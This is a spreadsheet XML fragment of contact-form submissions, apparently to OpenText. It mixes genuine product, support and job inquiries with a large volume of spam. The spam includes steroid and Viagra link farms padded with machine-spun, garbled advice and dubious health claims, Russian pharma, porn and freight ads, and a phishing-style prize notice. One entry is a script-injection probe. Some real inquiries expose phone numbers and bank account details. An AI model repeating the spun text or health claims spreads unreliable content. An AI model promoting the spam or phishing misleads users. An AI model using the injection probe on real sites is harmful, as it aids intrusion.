    <t xml:space="preserve">[url=http://www.everydayrecipes.ca/images/event.php?id=1417-Testosterone-Rex-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk/]Testosterone Rex[/url]_x000D_
 Workout sessions for your personal canine ought to be enjoyable and stress-totally free. Your pet will become familiar with much better, and you will be able to instruct greater in the good surroundings. Make use of your training session being a connecting time along with your puppy and have fun. This will help along with your dog use a daily life-very long romantic relationship._x000D_
  [url=http://www.lti.net.br/wp-content/uploads/string.php?win=190-Buy-Clomiphene-Citrate-Canada,Anabolic-Steroid-Names,Nandrolone-Prescription-Australia/]Buy Clomiphene Citrate Canada[/url]_x000D_
 To avoid lower back pain when looking at files, contain the paperwork inside a design whereby read with the eyeballs parallel together with the file. Searching and reading through files sideways or up and downward will location plenty of force on the upper back muscle tissues causing you to have lower back pain._x000D_
  [url=http://www.altaconsorcios.com.br/admin/state.php?a=493-Viagra-50-Mg-Prezzo,Viagra-Generico-Milano,Viagra-Senza-Ricetta]Viagra 50 Mg Prezzo[/url]_x000D_
 Online video marketing is really a approach containing cultivated in acceptance and that keeps great options for anyone prepared to give it a go. The most important step in starting your foray into this realm entails discovering everything you can about distinct tactics and techniques. The article that practices is a superb place to start undertaking just that._x000D_
  [url=http://www.synergy-it.pk/Content/feed.asp?iaaa=763-Testosterone-Online-Australia-Testosterone-Pill-Side-Effects-Testosterone-Propionate-Cycle]Testosterone Online Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t>I have been unable to log on and on requesting password reset, am advised that email not registered</t>
  </si>
  <si>
    <t>For selling the Documentum products or OpenText products means kind of pre sales activity how would I get information like product brochures, or datasheets or demos or some technology help about products features, latest product versions information, and recommend upgrade approach to existing customers etc. For that do I need partner login account or in any other way to get those information??? If I look for a partner account then what type of partnership is suitable for me to pre sales activity for Documentum and OpentText products. please guide me</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Job opportunity </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have updated Design Automation Conference 2018 Attendees list and we now have a total of 4,899 contacts attending Design Automation Conference 2018 event._x000D_
_x000D_
Would you be interested acquiring in the list of Attendees with complete contact information for pre-show marketing campaign, appointment setting, networking and various other post-show Marketing initiatives._x000D_
Data fields: Company names, Contact name, Title designation, email address, phone number, complete mailing address. We only include opt-in contacts in our database._x000D_
_x000D_
Thanks &amp; I’ll look forward to your response._x000D_
_x000D_
Regards,_x000D_
Natasha Simson_x000D_
Trinetsys-Event Attendees Specialist.</t>
  </si>
  <si>
    <t>Would like a quote._x000D_
We are currently looking to move our on premise faxination service to the cloud._x000D_
We currently have 8 numbers associated with different email addresses and thus would like a quote for this amount of numbers so the service we offer our customers does not change._x000D_
_x000D_
regards Steve</t>
  </si>
  <si>
    <t>Dear madams &amp; sirs,_x000D_
_x000D_
I tried to contact the former KA from Opentext for Deutsche Bahn/ DB Systel, Mr. Thomas Weidenfeller. He seems not to work for OT anymore._x000D_
So, who`s the KA or contact in your company for us ?_x000D_
_x000D_
Thank you and kind regards,_x000D_
Jan Gräser</t>
  </si>
  <si>
    <t>Pricing for OpenText Actuate iHub and OpenText Birt Reporting Desinger tool</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
Our customer State Bank of Vietnam (SBV) would like to have a system for archiving and content services that stores electronic transactions between every banks of Vietnam (via Internal Bank Payment System - IBPS and SBV core banking system)._x000D_
We found that your solution could meet SBV requirement and we also had cooperation with you in Tax Deparment's archiving project._x000D_
_x000D_
Could you pls arrange a presentation your solution for SBV? we will propose you to them._x000D_
Thanks &amp; Regards_x000D_
Linh</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to know the purchase and maintenance cost of these 2 licenses:_x000D_
OpenText Enterprise Now 14 - 64 bit _x000D_
OpenText Enterprise Now 15</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.intratel.nl/bin/list.php?m=69-Getropin-Igf-1-Lr3-Review-Kigtropin-SatÄ±n-Al-TillvÃ¤xthormon-SÃ¶mn]Getropin Igf-1 Lr3 Review[/url]_x000D_
 Filing for bankruptcy doesn't need to be as complicated as you might feel. If you use the ideas in the following paragraphs, you are sure with an less difficult time. Just stay focused around the ultimate outcome, and it is possible to cope with bankruptcy far more very easily than you imagined probable.Helpful Tips To Relieve The Process Of Getting Older_x000D_
  [url=http://www.boutiquecookie.com/Scripts/user.php?q=113]Primobolan Nz[/url]_x000D_
 To conclude, car insurance are available for vehicles, vans, pickup trucks, motorcycles, and also other cars. The insurance plan for many of these autos, compensates car owners in incidents. When you keep in mind recommendations that were supplied inside the article previously mentioned, then you can definitely pick insurance for what ever kind car you possess.Make The Most Out Of Your Daily Life Insurance policy Expertise_x000D_
  [url=http://www.konudmimarlik.com//images/pear.php?vb=47-Riptropin-KÃ¶pa-Kigtropin-KÃ¶pa-KÃ¶pa-Hgh-Frag/]Riptropin KÃ¶pa[/url]_x000D_
 Lookup close to your location for homeschooling sources. Depending on where you live, you could potentially get access to lots of social activities with a good deal, including art gallery tours and opera. Moreover, there can be a club or online discussion board focused on homeschooling mothers and fathers in your area. This lets you gain some advice from others as well as talk about your very own._x000D_
  [url=http://www.oozeetech.com/Product/system.php?j=443-4-chlorodehydromethyltestosterone-Powder-Dianabol-Australia-Price-Anavar-Oxandrolone-Sale.html]4-chlorodehydromethyltestosterone Powder[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Job Application </t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstva/36/&gt;hepcinat lp москва&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/908/]LuciDas-дженерик Спрайсел (Sprycel) – Дазатиниб купить[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/541/&gt;купить зелбораф в москве&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/906/]ленвима[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.pimex.pl/libraries/cache.php?h=1141-Tadalafil-Powder,Clomid-Australia-Price,Mesterolone-Ireland]Tadalafil Powder[/url]_x000D_
 Join a support team to assist you with your pursuit to quit smoking. A support group can commiserate along with you concerning the challenges that stop smoking involves, and reveal their coping mechanisms. The best choice of the group of people will also be in a position to instruct you on conduct adjustment tactics, or some other tactics that could demonstrate valuable._x000D_
  [url=http://www.loktal.fr/cache/simple.php?p=1539-Trenbolone-Acetate-Canada-Methenolone-Oral-Tadalafil-Supplier]Trenbolone Acetate Canada[/url]_x000D_
 Should you lease a property or perhaps condo, it is always important to obtain your personal renter's insurance policy. Even though a property owner has property insurance, it doesn't mean that you can expect to get compensation for your personal points. Most of the time, the insurance policy your landlord bears only addresses the property and instant property, not the things you possessed inside of._x000D_
  [url=http://balletpointe.co.uk/cli/yx.php?id=467]Viagra Rezeptfrei Kaufen Erfahrungen[/url]_x000D_
 As aforesaid, lots of people are unacquainted with how unbearable significant anxiety may be. Hopefully, should you suffer from anxiety, the collection of suggestions incorporated in this post will help you to decrease the seriousness of some of the indications of your problem. Probably, it could be smart to have a copy with this report convenient, so that you can reference it, whenever you have will need.Anyone Can Improve Their Dental Care With These Superb Advice_x000D_
  [url=http://www.vrtacicrobert.si/images/move.php?gallery_id=18]Hygetropin 10iu[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.veenussofttech.com/images/back.asp?p=262-Buy-Anavar-Steroids-Australia-Anadrol-50-Australia-Boldenone-Steroid-Price/]Buy Anavar Steroids Australia[/url]_x000D_
 To help you stop many forms of cancer, beverage pomegranate liquid day-to-day. Pomegranate liquid includes a useful blend of isoflavones, polyphenols, and ellagic acid solution which some feel are anti cancer elements. It has been proven to get a good influence on prostate cancers in certain lab creatures. Pomegranate just may well increase your personal body's defenses against cancers and maintain you healthy._x000D_
  [url=http://www.jmsprojects.co.za/logs/move.php?h=628-Methandienone-Ireland,Methandienone-Usa,Tadalafil-Powder-For-Sale]Methandienone Ireland[/url]_x000D_
 If you're proceeding outside in the sun light, ensure you always put on shades. The rewards from sun glasses are two collapse. They safeguard your eyes from your damaging Ultra violet rays and might help keep the eyes sharp for many years. They'll also prevent you from squinting to discover and prevent you from acquiring lines and wrinkles from using it._x000D_
  [url=http://www.kilicmakina.com.tr/css/assets.php?v=244]Kamagra Jelly Kaufen[/url]_x000D_
 In case you are acquiring a piece of jewelry and possess the solution to have it inscribed because of yourself or perhaps to an individual that you are currently gifting the expensive jewelry to, make it an even more special occasion and write a wonderful information on the inside. You will be customizing the product and giving it more of a story so it will likely be a lot more respected by the partner._x000D_
  [url=http://www.idocommunications.ca/wp-includes/apple.php?id=226]Kamagra Kopen Den Haag[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bubenimhayatim.com/wp-content/wolf.php?tag=675]Dianabol Pills Price In South Africa[/url]_x000D_
 To assist you to spend less while shedding weight, purchase your outfits at thrift stores. Using this method, you possess smaller outfits to use and you will not have to commit lots of money upon them. Quickly you will need to acquire even more compact outfits, so saving money to them will help._x000D_
  [url=http://www.2itechnet.com/screenshots/back.php?hot=114]Boldenone New Zealand[/url]_x000D_
 Incorporate new webpages and content material into your site regularly to keep it fresh. Search engines seek out new content material when they crawl and list internet sites. Getting new information implies your site is listed once more, and new, consistently current information can also help to raise your rating in search results web pages. Weblink relevant Really simply syndication rss feeds to the website as an easy way to incorporate clean content material on a regular basis._x000D_
  [url=http://www.viptransport39.ru/wer/list.php?new=114-Real-Hygetropin-For-Sale-Hgh-People-Also-Search-For-Human-Growth-Hormone-For-Sale-Gnc]Real Hygetropin For Sale[/url]_x000D_
 Be cognizant of schedule actions that set off the need to have a cigarette smoke. For a few, this is basically the very first mug of coffee in the morning. For other people it could be the end of the dish, or socializing with cigarette smoking close friends. Whichever your trigger can be, it is now time you must remind oneself that you are currently giving up since you attention adequate about yourself you want to._x000D_
  [url=http://www.bateriasexpress.com.br/images/access.php?xaaa=140]hygetropin hgh 200iu kit[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.soulspaceministry.com/gaypriests/cgi-bin/pear.php?w=1496-Testosterone-Test-Nz-Oxandrolone-Price-Usa-Trenbolone-Pills/]Testosterone Test Nz[/url]_x000D_
 It is possible to require a photo on your own apple iphone without worrying about trembling your telephone. Simply use the amount control that is certainly around the cord of the earbuds. You require a stable hand focused to the impression you intend to record before you decide to a single thing in addition. This really is a very practical attribute. Just use the control buttons about the cord when you wish to adopt a picture._x000D_
  [url=http://www.restaurantemetropole.com.br/wp-content/assets.php?ml=367-Clomid-For-Sale-Canada,Clomiphene-Citrate-Australia,Methandienone-Wholesale.html]Clomid For Sale Canada[/url]_x000D_
 If you get to your campsite, the very first thing you must do would be to start accumulating wood for your personal fire. You won't seem like it later on, and if you wait until dim you should have a more challenging time getting the type of hardwood you should have a fire going. Do it right out._x000D_
  [url=http://www.shankarenterprise.com/images/num.php?yz=104-Kamagra-Piller,Kamagra-Jelly,KjÃ¸p-Viagra-I-Norge/]Kamagra Piller[/url]_x000D_
 Acquiring enough workout, remarkably, assists combat zits. Exercising aids all of the systems from the entire body, including the pores and skin. Doing work up a sweat flushes the pores and will help prevent them from blocking. Provided that exercising clothing does not chafe or inflame pimples-susceptible epidermis, the benefits of exercise considerably outnumber the issues._x000D_
  [url=http://www.marjack.com.br/includes/box.php?idreceita=432-Viagra-Pharmacie-Maroc,Lovegra-Forum,Viagra-Feminin-Achat/]Viagra Pharmacie Maroc[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jgdprojects.co.uk/temp/list.php?a=583-Viagra-Para-Ellas,Comprar-Kamagra-Online-EspaĂ±a,Kamagra-Gel-100-Mg]Viagra Para Ellas[/url]_x000D_
 The two main hazards on paper an helpful post: being aware of an excessive amount of and knowing inadequate regarding the topic. From the past, you could unload far too several particular details, dropping the fascination in the standard viewer. But when you actually don't know the subject, an intelligent reader will capture on pretty shortly._x000D_
  [url=http://www.fortsound.com.br/css/form.php?like=535]Drostanolone Propionate 100mg[/url]_x000D_
 Spend some time. You do not need to have a mobile advertising strategy completely ready in some several weeks only. You ought to take some time you need to accumulate your customer's phone numbers, and to create a number of methods before testing them with a small group._x000D_
  [url=http://www.epaggelmaties.com/Templates/event.php?o=Testosterone-Shots-Not-Working-Oxandrolone-Prescription-Canada-Testosterone-Cypionate-Medication-869.html]Testosterone Shots Not Working[/url]_x000D_
 Mentioned previously just before, the quantity of folks encountering bankruptcy has gone up on account of the condition from the economic climate. It can be frightening to deal with personal a bankruptcy proceeding, but with a bit of aid, anybody can conquer it. The information from this information will enable you to or anybody else obtain their financial situation way back in order and get away from individual individual bankruptcy forever.Declaring Bankruptcy? These Tips Can Help_x000D_
  [url=http://www.toddheaden.com/wp-content/system.php?s=917-Oxymetholone-Powder-For-Sale-Anabolic-Steroid-Names-Nandrolone-Prescription-Australia.html]Oxymetholone Powder For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Еврейская социальная сеть знакомств в Израиле _x000D_
 _x000D_
[url=http://israface.com]Израиль еврейские женщины подробнее по ссылке[/url]  </t>
  </si>
  <si>
    <t>Здpавcтвyйтe! _x000D_
 _x000D_
Пoздрaвляем Bаc! Вы стaли одним из большинcтва победитeлей социальнoй aкции Pоcсии, cтран СНГ и Пpибалтики в нoминaции "Активный пользoватeль Email-aдpeсa". _x000D_
 _x000D_
Узнать cумму вoзнaгpаждeния мoжнo нa caйте - самолет _x000D_
 _x000D_
 _x000D_
C уважением, Мeждyнародная ассоциация почтoвых cервисов.</t>
  </si>
  <si>
    <t>master resource Jarle Thorsen Kielce</t>
  </si>
  <si>
    <t>Hi,_x000D_
Need help with HR contact details for an opportunity with Opentext._x000D_
Thank you,_x000D_
Abhay Singh_x000D_
+91-9628985770</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=https://waterloo-collection.ru/1721/]5 копеек 1790 г[/url]  - можете купить на сайте антиквариата [url=https://waterloo-collection.ru]waterloo-collection.ru[/url]</t>
  </si>
  <si>
    <t>Investigating new EDI platform.  (budget season)</t>
  </si>
  <si>
    <t>Установка офисных перегородок в Санкт-Петербурге и Краснодаре.&lt;br&gt; _x000D_
Установка перегородок любого вида под ключ от 7 дней.&lt;br&gt; _x000D_
[url=http://112358.pro/]СЃС‚РµРєР»СЏРЅРЅС‹Рµ РїРµСЂРµРіРѕСЂРѕРґРєРё С†РµРЅР°[/url]</t>
  </si>
  <si>
    <t>Установка офисных перегородок в Санкт-Петербурге и Краснодаре.&lt;br&gt; _x000D_
Установка перегородок любого вида под ключ от 7 дней.&lt;br&gt; _x000D_
[url=http://112358.pro/]РїРµСЂРµРіРѕСЂРѕРґРєРё РёР· РјРґС„[/url]</t>
  </si>
  <si>
    <t>[url=http://pornovar.net/categories/]бесплатное порно[/url]</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
Sou sócia da empresa Agile Consultoria em RH, cliente do Banco Itaú e no dia 10/05/18 fiz um depósito por engano em favor da Open Text tec. da Inf. Brasil Ltda cuja c/c é  01564-9 agencia 9337 do Itau no valor de R$ 890,00. Contatei a minha gerente no Itau e ela contatou o gerente da conta acima citada sendo que a área financeira está ciente do erro . Gostaria de pedir a área financeira que estorne o valor para a conta da Agile: 0725 c/c 800841 por favor, pois houve um engano. Contando com a colaboração fico no aguardo de uma providência, pois este evento ocorreu há um mês e ainda não houve sinalização por parte da Open Text de solucionar  o caso. Desde já grata pela atenção, Thais Chulman: 11999971436</t>
  </si>
  <si>
    <t>Hello _x000D_
I've been asked by my company to install "SAP Invoice Management by Open Text 7.5" and "Open Text Invoice Capture Center 7.5" on one of our demo systems._x000D_
_x000D_
Its an ECC6.0 EHP7 with the latest SPS#_x000D_
_x000D_
I am having trouble finding the installation packages. and only found the patches._x000D_
_x000D_
Please could you provide me a direct link or access?_x000D_
_x000D_
kind regards_x000D_
Duncan</t>
  </si>
  <si>
    <t xml:space="preserve">cialis 20mg review who is online_x000D_
 [url=http://ice.xlviagragtr.com]canadian pharmacy viagra professional new posts[/url]_x000D_
  norvasc cialis_x000D_
 &lt;a href=http://west.rxviagracan.com&gt;viagra daily&lt;/a&gt;_x000D_
 - cialis trackbacks deja un comentario_x000D_
 cialis dosage 20 mg announcements_x000D_
</t>
  </si>
  <si>
    <t>Please give me trial version</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.vigmax.com/data/move.asp?daaa=625-Dianabol-For-Sale-Boldenone-Cypionate-Vs-Eq-Anavar-Oxandrolone-Side-Effects/]Dianabol For Sale[/url]_x000D_
 Write the kind of articles that may be distributed. Discover how to write inside an fascinating way that helps make folks would like to reveal your writing making use of their friends and connections. This is an essential action you can take with social websites. If you wish to get to a lot more people, you have to be deserving of it exceptional content articles are crucial._x000D_
  [url=http://www.dmrelectrical.co.uk/contact/assets.php?about=640]Viagra Vendita Libera[/url]_x000D_
 Although it might require lots of hard work, decrease for the nearby collection and study flood plains in your town. Should you be specified in the flood ordinary, but can prove your property did not deluge during the last function, you could possibly alter your designation and preserve several hundred dollars per year._x000D_
  [url=http://www.restaurantemetropole.com.br/wp-content/assets.php?ml=931-Oxymetholone-Steroid-Tablets,Clomiphene-For-Men,Nandrolone-Wholesale.html]Oxymetholone Steroid Tablets[/url]_x000D_
 A significant tip to take into account when regarding acne breakouts are that tanning may actually lead to acne to flare up more than ever before. This is significant to take into account as there is a fragile harmony involving bad and good that will originate from direct sunlight. With some coverage, the skin will be much more balanced and hide imperfections. With an excessive amount of publicity, the skin will lose a lot more and result in possible pore blocking._x000D_
  [url=http://www.markazetabadol.ir/ckfinder/cancle.php?fr=427-Buy-Boldenone-Undecylenate,Buy-Boldenone-Acetate,Australia-Testosterone-Replacement-Therapy/]Buy Boldenone Undecylenate[/url]_x000D_
</t>
  </si>
  <si>
    <t>recently my computer crashed and I have to reload all my programs. I've owned Brava desktop for several years and I depend on it. Pleas guid me through the reload.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.petstohomecr.com/bat/fog.php?com=218]Hgh Cycle[/url]_x000D_
 E-mail entrepreneurs will be intelligent from which include pre-examined prefer-in bins in their e-mails. As a result you look untrustworthy in your readers as they may take this to be a small to frontward. Also, if you allow readers opt0in on their own, you create a far better email list of customers that happen to be actually interested in your business._x000D_
  [url=http://www.electronixdepotinc.com/images/event.asp?y=956-Testosterone-Undecanoate-Injection-Dosage-Primobolan-Half-Life-Winstrol-For-Sale-Philippines]Testosterone Undecanoate Injection Dosage[/url]_x000D_
 Ensure you're looking for vouchers concerning purchases that happen to be somewhat out of the ordinary. This doesn't imply that you're pushing most of these purchases on your self. This means you're getting yourself ready for these varieties of purchases when you really need so they are. Perhaps there are actually income tax preparing discounts, motel hire discount rates, and much more will probably be accessible._x000D_
  [url=http://princesadomarlocadora.com.br/js/marry.php?hhj=236]Kamagra Pills[/url]_x000D_
 Load your cabinet with classic items. It really is okay if you wish to test out tendencies, but if you would like use a clothing collection that makes feeling, be sure you hold the timeless classics. You can even devote a little more on traditional parts because you know they will last inside your clothing lengthier._x000D_
  [url=http://www.exclusivecocktails.co.uk/includes/gallery.php?bn=615-Methandienone-25mg-Methandienone-China-Oxymetholone-Manufacturer]Methandienone 25mg[/url]_x000D_
</t>
  </si>
  <si>
    <t>&lt;script&gt;alert('me')&lt;/script&gt;</t>
  </si>
  <si>
    <t>Regarding DRM software Information</t>
  </si>
  <si>
    <t>Looking for Opportunities</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ambulance.gr/components/com_content/achieve.php?sui=109-Boldenone-Generic-Supplements-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa/]Boldenone Generic Supplements[/url]_x000D_
 Contrary to well-known notion, bugs don't just exist exactly where it's messy or littered with meals dirt. They may are living anywhere and prosper especially in locations that don't see plenty of measures. Because of this, it's a smart idea to undergo your closets, home, attic space and other locations that collect dust and are typically peaceful._x000D_
  [url=http://www.printransilvania.ro/images/walk.php?break=Methandienone-Ireland-Anabolic-Steroid-Names-Testosterone-Injections-Ireland-628/]Methandienone Ireland[/url]_x000D_
 Go to company workshops whenever possible. Some tutorials are designed for greater, out from the house enterprises, you will still be capable of discover a lot regarding the area by attending. If you have to journey to go, you can even subtract it from your income taxes so there is not any excuse in order to avoid them._x000D_
  [url=http://www.singwall.com.sg/wp-content/router.php?u=439-Clomiphene-Citrate-Cost,Buy-Tren-Acetate-Uk,Trenbolone-Acetate-Generic-Supplements]Clomiphene Citrate Cost[/url]_x000D_
 Keep your choices open up. Whilst customer loyalty is a good top quality to possess, you should be faithful to on your own initial. Your enterprise is generally considering its choices and you will as well. Keep the eye out for better paying jobs which you be eligible for a so that you will usually do not neglect the ideal task for you._x000D_
  [url=http://www.swisserguvenlik.com/install/watermelon.php?n=1053]Euro Generic Nandrolone Decanoate[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://aecbatteries.com/img/class.php?nld=897]Oxymetholone Benefits[/url]_x000D_
 Get rid of your sweaty function clothes once you are able. Dampness can become worse or even lead to yeast infections. In case you are somebody that functions out, make sure to modify from the exercise clothes as soon as possible. Have a shower room and dry away from completely before altering into something else._x000D_
  [url=http://www.msrisuty.cz/includes/media.php?start=1367-Testosterone-Phenylpropionate-Vs-Propionate-Nandrolone-Steroids-Trenbolone-Acetate-Powder-Suppliers]Testosterone Phenylpropionate Vs Propionate[/url]_x000D_
 Acquiring correct nourishment is actually a key component of a healthy life-style, but it can be hard to enjoy directly in today's speedy-paced, quickly-food items community. Even so, pursuing the suggestions you study on this page may help you prevent some typical nutrients blunders and stay on the way to much better lifestyle by means of healthier eating.Using The Correct Type Of Merchandise To Your Your hair Texture_x000D_
  [url=http://www.kenoxip.com/scripts/menu.php?b=2282-Winstrol-Canada-Legal,Oxandrolone-Uk-Price,Testosterone-Australia-Legal.html]Winstrol Canada Legal[/url]_x000D_
 In case you have a lot more than 3 people camping out together with you, acquire coupled multiple tent. You are likely to want some level of privacy at the same time or some other. Any additional tent will have the ability to get some "me" time whilst with the camping web site. Additionally, it gives you more storing to hold animals away from your items._x000D_
  [url=http://www.dmgeventspecialist.com/librarie1s/world.php?put=919-Oxymetholone-Manufacturers-Clomid-Singapore-Forum-Testosterone-Phenylpropionate-Recipe/]Oxymetholone Manufacturers[/url]_x000D_
</t>
  </si>
  <si>
    <t>I looking for challenging job not only technically as well as logically</t>
  </si>
  <si>
    <t>Better opportunity and role</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.eyeconeoptical.com/include/class.php?Bid=1023-Methandienone-Tablets-Benefits-Boldenone-Cypionate-Vs-Eq-Anavar-Oxandrolone-Side-Effects]Methandienone Tablets Benefits[/url]_x000D_
 Don't depend upon outside sources fully. Create your own personal skills and techniques to evaluate the current market, and make your own personal selections. Forex trading is actually a sophisticated career even people who imply properly can't tell you every thing they generally do to make good decisions. Make use of the details they can provide, and include it in your decision making process._x000D_
  [url=http://www.iranlascad.ir/ckfinder/backup.php?re=1485-Oral-Stanozolol-For-Sale,Boldenone-Undecylenate-Powder,Stanozolol-Uses/]Oral Stanozolol For Sale[/url]_x000D_
 When you and your betrothed start introducing things to your wedding event windows registry, don't be afraid to add items that are over-the-best, expensive, or just a bit complex. Concentrate on choosing things that one could equally imagine as part of your new distributed life jointly based upon your discussed preferences, not the purchase price tag._x000D_
  [url=http://msrisuty.cz/language/assets.php?start=936-Oxymetholone-Tablets,Clomiphene-Citrate-Australia,Methandienone-Wholesale]Oxymetholone Tablets[/url]_x000D_
 Make sure to appear (and are) trustworthy. Give very good, trustworthy advice and knowledge and back it up and boost it by putting together Q And A podcasts for which you consider telephone calls from your viewers and fans and answer their queries about your niche market. This will give you the opportunity to bring in other professionals within your industry and present readers and fans truly important advice and knowledge._x000D_
  [url=http://www.desgpc.org/css/fall.php?more=Buy-Stanozolol-Online-Anabolic-Steroid-Names-Testosterone-Injections-Ireland-264/]Buy Stanozolol Online[/url]_x000D_
</t>
  </si>
  <si>
    <t>evaluating records classification, archive, retention and purge solution</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.afutura.com/wp-content/state.php?ko=124-Viagra-Kamagra-Thailand,Cialis-Wiki,Viagra-50]Viagra Kamagra Thailand[/url]_x000D_
 Change roles as often that you can. Resting or standing in just one place on an extensive period of time can be quite a important set off to back problems. Rather, modify it. Locate ways to do activities that typically need to be completed in stagnant placements in a number of ways! Many of your office routines can be tweaked to be done in techniques more good for your position._x000D_
  [url=http://www.zabanara.com/kontakt/assets.php?sh=94]Anadrol Tablets Benefits[/url]_x000D_
 When you're handling a bigger creature, for instance a mouse, take into account putting made back again or perhaps peanut butter around the snare. Enable peanut butter dry up a bit to harden and attach the sausage to ensure that it will pull around the set off and trap the mouse in the capture._x000D_
  [url=http://www.ptrmk.com/images/base.asp?gh=313-Stanozolol-Oral-Australia-Primobolan-Half-Life-Winstrol-For-Sale-Philippines]Stanozolol Oral Australia[/url]_x000D_
 Use corn starch for oily your hair. If you're some of those those with greasy your hair, corn starchy foods can really help. Corn starch helps you to absorb any essential oil which might be in your head of hair. Take a small amount and massage it into oily locations along with your head of hair can look nice and refreshing._x000D_
  [url=http://www.labarypinheiro.com.br/bemil/event.asp?lock=84]Cialis GĂ©nĂ©rique[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi - My company was recently picked up by Nordstrom. We are working with GS1 to get our Company Prefix and now need to decide on a UPC Catalog. We are looking at OpenText/GXS and InterTrade. I wanted to see if anyone could email/jump on a call to go over pricing and general questions._x000D_
Best,_x000D_
Allie</t>
  </si>
  <si>
    <t>Hi_x000D_
I would like to access My support Section._x000D_
Can you please provide this?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>I am trying to gain access to the support page so I can see if our RightFax software needs updating. Do I need to request this access in order to view this information?</t>
  </si>
  <si>
    <t xml:space="preserve">We have 2 fax lines setup with Right Fax that send to a group email address.  These group email addresses were recently converted to Outlook 365.  Now when a fax comes in for one of these groups, it gets stuck in the Faxes / Undelivered area of Right Fax.  If we select the fax there and choose Route - then enter one of the group email addresses having trouble, it goes through without trouble.  Any thoughts on why these are unable to deliver when the fax first comes in?  The group email addresses are retail@proampac.com and keepsafe@proampac.com </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.89erpride.com/wp-content/menu.php?r=1129-Tadalafil-Api-Manufacturer,Clomid-Australia-Price,Mesterolone-Ireland.html]Tadalafil Api Manufacturer[/url]_x000D_
 Do you know that the microorganisms in ordinary low fat yogurt will help overcome a candida? It is a fact, but it has to be unsweetened fat free yogurt. Yeast feeds on sugars and natural yogurt will never be helpful if it contains glucose. You may even apply it being a topical treatment by dipping a tampon in yogurt._x000D_
  [url=http://www.hi-techenergysaving.com/css/menu.php?cat_id=866]Oxandrolone Prescription Uk[/url]_x000D_
 Caffeine will help your house office feel similar to a true workplace. A lot of caffeine places offer you free of charge WiFi, in order to are employed in them as you buy your gourmet coffee resolve. Take into account that a great deal of dining places have World wide web at the same time._x000D_
  [url=http://www.artesimoveis.com/images/year.php?=65]Primobolan Acetate Vs Enanthate[/url]_x000D_
 Preventing your hypersensitive sparks, whether it be specific wildlife like cats and dogs or materials that induce pores and skin irritability, is one of the easiest ways to cope with your allergy symptoms without spending dollars. Understanding low-drowsy antihistamines can help make your day a tad bit more tolerable, too. Bear in mind these guidelines to handle your allergies properly, and feel much better!Ideal Way To Handle Major depression Inside Your Everyday Routine_x000D_
  [url=http://www.idocommunications.ca/wp-includes/apple.php?id=151]Kamagra 100 Mg Goedkoop[/url]_x000D_
</t>
  </si>
  <si>
    <t>UI/UX Designer position</t>
  </si>
  <si>
    <t xml:space="preserve">недорогие грузоперевозки Челябинск отзывы_x000D_
международные грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Омск_x000D_
международные грузоперевозки РФ РБ отзывы_x000D_
грузоперевозки Пермь отзывы_x000D_
международные грузоперевозки Омск отзывы_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
недорогие международные грузоперевозки РФ РБ отзывы_x000D_
недорогие грузоперевозки Россия Беларусь_x000D_
 _x000D_
[URL="https://mityr-trans.com"]международные грузоперевозки Тюмень отзывы[/URL] _x000D_
международные грузоперевозки РФ РБ отзывы_x000D_
международные грузоперевозки Тюмень отзывы_x000D_
недорогие грузоперевозки Россия Казахстан отзывы_x000D_
недорогие грузоперевозки Пермь_x000D_
международные грузоперевозки Россия Беларусь_x000D_
грузоперевозки Пермь_x000D_
грузоперевозки Красноярск отзывы_x000D_
недорогие международные грузоперевозки РФ РБ отзывы_x000D_
недорогие международные грузоперевозки Россия Казахстан отзывы_x000D_
грузоперевозки Новосибирск_x000D_
</t>
  </si>
  <si>
    <t>I am looking for software that can mask information in a .tiff file.  It sounds like the Open Text Blazon has this ability but I would like to confirm.  I would also like to know if you have a demo version that we can look at._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi, I don´t have enough priviledges to access to Technical Support in My Support menu. Indicates my acount didn´t grant the access to this resource. Appreciate your help. Ragards.</t>
  </si>
  <si>
    <t>22cthoughoutl _x000D_
_x000D_
22cthulu 2 elements listed 1 day the particular_x000D_
_x000D_
